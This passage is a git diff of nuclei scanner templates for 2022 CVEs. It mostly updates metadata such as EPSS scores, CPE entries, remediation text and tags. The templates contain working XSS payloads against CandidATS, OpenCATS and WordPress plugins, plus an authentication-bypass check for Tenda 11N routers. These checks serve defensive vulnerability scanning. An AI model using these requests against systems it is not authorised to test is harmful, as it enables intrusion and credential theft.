backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated + tags: cve2022,cve,xss,cms,backdrop,authenticated,backdropcms http: - raw: @@ -82,4 +84,4 @@ http: regex: - 'name="form_token" value="(.*)"' internal: true -# digest: 4a0a00473045022054f1330fffee70de0e8afc83cd7d8a333ba68b48b47fc3f1a170c4d6a7e0278d022100ef93b5e8c8bfaec9b21f30cf239a665708137ee5e9e2acaf21aedf20ea8f4403:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220034fd820495574945439e0f2771b2d730d3e01fc650ba5df79aa66b3e608f66f0220265468d28c9449a6e73199f71f1dc5cbdba0efdb3834a6dc0642156047d88771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42096.yaml b/nuclei-templates/CVE-2022/CVE-2022-42096.yaml index 08a026ecb8..90bb990148 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42096.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42096.yaml @@ -18,15 +18,15 @@ info: cvss-score: 4.8 cve-id: CVE-2022-42096 cwe-id: CWE-79 - epss-score: 0.00616 - epss-percentile: 0.76384 + epss-score: 0.00345 + epss-percentile: 0.68611 cpe: cpe:2.3:a:backdropcms:backdrop_cms:1.23.0:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: backdropcms product: backdrop_cms - tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive + tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms http: - raw: @@ -187,4 +187,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a004730450220071d5244c3f1f7bfbf8a1631a3b7306263b61f7e39e9fe1aaaa5c7f6d3f54610022100ee7c6e20d6aa229226932bdbf25db6f1e149bc364587fe9ecd846997dac65c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d511f8ca03bfd62c3ce9d4eb61ca34977675265bb516ecfc806a64e8785b81d6022041909cc1f36dc06c223ccc56a5e642045be29cfddd45f69658f28149169cf16e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42233.yaml b/nuclei-templates/CVE-2022/CVE-2022-42233.yaml index 8ec9f4476b..bbcead7f84 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42233.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42233.yaml @@ -5,22 +5,33 @@ info: author: For3stCo1d severity: critical description: | - Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability. + Tenda 11N with firmware version V5.07.33_cn contains an authentication bypass vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest firmware update provided by Tenda to fix the authentication bypass vulnerability (CVE-2022-42233). reference: - https://github.com/D0ngsec/vulns/blob/main/Tenda/Tenda_11N_Authentication_Bypass.md - https://nvd.nist.gov/vuln/detail/CVE-2022-42233 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-42233 cwe-id: CWE-287 + epss-score: 0.87277 + epss-percentile: 0.9839 + cpe: cpe:2.3:o:tenda:11n_firmware:5.07.33_cn:*:*:*:*:*:*:* metadata: - fofa-query: product=="Tenda-11N-Wireless-AP" + verified: true + max-request: 1 + vendor: tenda + product: 11n_firmware shodan-query: http.title:"Tenda 11N" - verified: "true" + fofa-query: product=="Tenda-11N-Wireless-AP" tags: cve,cve2022,tenda,auth-bypass,router,iot -requests: +http: - raw: - | GET /index.asp HTTP/1.1 @@ -34,8 +45,8 @@ requests: words: - 'def_wirelesspassword' - 'Tenda 11N' - condition: and case-insensitive: true + condition: and - type: word part: header @@ -45,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100b86e4c63dbaa65f20b84e2935e6d84f986fd943c6f626ad3a2d1b00526ea1d4c022071e2e1880c20e23bb3959dfd91cb4b52727a1129c9cc198ff74b8e5674d0c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4260.yaml b/nuclei-templates/CVE-2022/CVE-2022-4260.yaml index 2ad71f93c6..0752ba3d76 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4260.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4260.yaml @@ -6,21 +6,31 @@ info: severity: medium description: | WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system. + remediation: Fixed in version 1.69.1 reference: - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260 - https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk - remediation: Fixed in version 1.69.1 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2022-4260 cwe-id: CWE-79 + epss-score: 0.00092 + epss-percentile: 0.38207 + cpe: cpe:2.3:a:wp-ban_project:wp-ban:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp + verified: true + max-request: 4 + vendor: wp-ban_project + product: wp-ban + framework: wordpress + tags: cve,cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,wp-ban,wp-ban_project -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -30,17 +40,14 @@ requests: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1 Host: {{Hostname}} _wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes - - | GET / HTTP/1.1 Host: {{Hostname}} @@ -48,8 +55,6 @@ requests: host-redirects: true max-redirects: 2 - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: @@ -61,10 +66,9 @@ requests: extractors: - type: regex name: nonce - part: body group: 1 regex: - '_wpnonce=([0-9a-z]+)' internal: true - -# Enhanced by md on 2023/01/06 + part: body +# digest: 4a0a00473045022054e0cb92b1de30b9a6096c941364f4ef3dd2f229205099d8588224ea2f58f6c7022100ff925bcaa75297254f5780ad4137c14bd3e834a259440ea032f8b9a86bfc8fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42746.yaml b/nuclei-templates/CVE-2022/CVE-2022-42746.yaml index 6ff93c907c..d16dedd21d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42746.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42746.yaml @@ -6,21 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 - https://candidats.net/ + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42746 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' @@ -42,5 +54,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42747.yaml b/nuclei-templates/CVE-2022/CVE-2022-42747.yaml index 767e94ed5a..bd1e3f515d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42747.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42747.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ @@ -16,12 +20,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42747 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.43507 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0' @@ -43,5 +53,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42748.yaml b/nuclei-templates/CVE-2022/CVE-2022-42748.yaml index adcfac438a..1dc7d0f8b4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42748.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42748.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42748 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' @@ -43,5 +54,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42749.yaml b/nuclei-templates/CVE-2022/CVE-2022-42749.yaml index 37d5666fc2..0bac3de00d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42749.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42749.yaml @@ -6,22 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42749 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' @@ -39,10 +50,9 @@ requests: part: header words: - text/html - condition: and + - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4295.yaml b/nuclei-templates/CVE-2022/CVE-2022-4295.yaml index 06d5f0f947..834b58e037 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4295.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00097 + epss-percentile: 0.40181 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: show_all_comments framework: wordpress publicwww-query: /wp-content/plugins/show-all-comments-in-one-page - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: - method: GET @@ -41,4 +43,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and -# digest: 4a0a0047304502200b2495b0c979e15c7380ca114c9bdad66622e76d955b321b069415107f9364b6022100deeb4950d93c281420b965993568a1a274146dda69c6e8320c732de1c53b8624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4301.yaml b/nuclei-templates/CVE-2022/CVE-2022-4301.yaml index 345235cb24..138f7b839b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4301.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4301.yaml @@ -6,17 +6,22 @@ info: severity: medium description: | WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.9.15. reference: - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d - https://nvd.nist.gov/vuln/detail/CVE-2022-4301 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4301 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00119 + epss-percentile: 0.45193 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: sunshinephotocart product: sunshine_photo_cart framework: wordpress - tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth + tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart http: - method: GET @@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d5b86f9c6ec39d69bf1f3be997260094e370204739c661c46c52e5433f868b302202981fb423c4b7f4f9e799e882762f1fa7b1f7fa9754c5a601c2702a92453657c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004861bd06361905004a5a3a5fd6715270499b87d1113acf26602abe2cca52cce0221009a6dcf1e34ccf2f1cd18759061c384d5b62637883e9d2c2b0652467c6edb44fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43014.yaml b/nuclei-templates/CVE-2022/CVE-2022-43014.yaml index 896193e035..e9be075582 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43014.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43014.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43014 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43014 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43015.yaml b/nuclei-templates/CVE-2022/CVE-2022-43015.yaml index ba07736c00..46e174e250 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43015.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43015.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43015 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43015 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43016.yaml b/nuclei-templates/CVE-2022/CVE-2022-43016.yaml index 79f6773f15..6fa025fbf6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43016.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43016.yaml @@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43016 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43016 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /index.php?m=toolbar&callback=&a=authenticate HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43017.yaml b/nuclei-templates/CVE-2022/CVE-2022-43017.yaml index 4088db0a0b..e30ecdfee1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43017.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43017.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 @@ -14,12 +18,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43017 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.40565 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +37,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)">&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -50,5 +58,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43018.yaml b/nuclei-templates/CVE-2022/CVE-2022-43018.yaml index de8bd46573..5b1583f4d7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43018.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43018.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 